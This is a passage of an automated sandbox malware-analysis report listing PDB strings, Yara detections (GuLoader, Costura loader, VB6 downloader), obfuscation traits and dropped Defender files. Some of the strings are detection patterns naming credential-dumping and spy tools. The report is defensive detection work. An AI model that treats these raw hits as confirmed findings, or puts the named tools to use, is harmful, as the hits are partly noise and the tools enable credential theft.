Source: Binary string: ScreenSnapshot.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: (\Install\trunk\out\release\setup.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: PasswordFox.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msswch.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: :\XiaZaiQi\pdbmap\WanNeng\Install.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Microsoft.Exchange.Clients.Event.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: BTR.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb3 source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\chkdsk\objfre\i386\chkdsk.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: endpointdlp.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18587207189.0000027770034000.00000004.00000001.sdmp
Source: Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \SharPersist.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: tkDecript.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug|Release).{0,20}\\[A-Z]\1(Exe|Dll)\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 0000000B.00000003.18265076735.0000021B4BD14000.00000004.00000001.sdmp
Source: Binary string: Release\StrongVaultApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\PortReuser\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: F:\hVjjmsck\zunzMo\dAQQ.pdb source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp
Source: Binary string: CatalinaUpdate_unsigned.pdbx| source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp
Source: Binary string: ntvdm.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: offreg.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: $loader\Driver\objfre\i386\apcdli.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .smmservice_with_regedit\Release\smmservice.pdbx source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: d:\MPEngine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Data\System.Data.pdbp1 source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: \wtsapi32_x86.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: \Ships.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: Release\binkiland.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-com-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: \release\libcurl.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: smmservice_with_regedit\Release\smmservice.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \TelMgr.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: D:\Work\TopMedia\SVN\GetPrivateInstaller\DLLs\InstallerService.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: resutils.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: \\NetSpy\\Distr\\KGBSpy\\Mpk64\.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \ProcessHacker.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: Release\tb_setup_zip.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: klovnafa.pdbx0 source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l2-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18266494773.0000021B5F47F000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\CmdShell.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \\dev\\Desktop\\Dropbox_control\\Client_Dropbox\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCRegistryShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: transmission-qt.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.18689801595.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Costura Assembly Loader
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18277822785.0000021B5E0EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_00403A31 push ebx; ret 6_2_00403A38
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_0040731C push ds; ret 6_2_00407336
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B0010 push edi; iretd 6_2_022B0027
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B6A4C push esp; retf 6_2_022B6A17
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B46A7 push 0000003Dh; iretd 6_2_022B46AB
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B3E82 push eax; iretd 6_2_022B3E83
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B0085 push edi; iretd 6_2_022B009C
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B3692 push edx; ret 6_2_022B3693
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B10FF push esp; retf 6_2_022B114D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B10C8 push esp; retf 6_2_022B114D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B69A0 push esp; retf 6_2_022B6A17
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0074AF3E push ds; retf 22_3_0074AF40
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0074AF3E push ds; retf 22_3_0074AF40
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0074AF3E push ds; retf 22_3_0074AF40
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0074AF3E push ds; retf 22_3_0074AF40
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.17.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.17.dr Static PE information: section name: .didat
Source: NisSrv.exe.17.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.17.dr Static PE information: section name: .didat
Source: MpClient.dll.17.dr Static PE information: section name: .didat
Source: MpCommu.dll.17.dr Static PE information: section name: .didat
Source: MpRtp.dll.17.dr Static PE information: section name: .didat
Source: MpSvc.dll.17.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.17.dr Static PE information: section name: .didat
Source: MpClient.dll0.17.dr Static PE information: section name: .didat
PE file contains an invalid checksum
Source: mpavbase.vdm.11.dr Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.11.dr Static PE information: real checksum: 0x329e303 should be:

Persistence and Installation Behavior:

barindex
Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm Jump to dropped file
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ucrtbase.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpEvMsg.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleMarshal.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpAsDesc.dll.mui Jump to dropped file
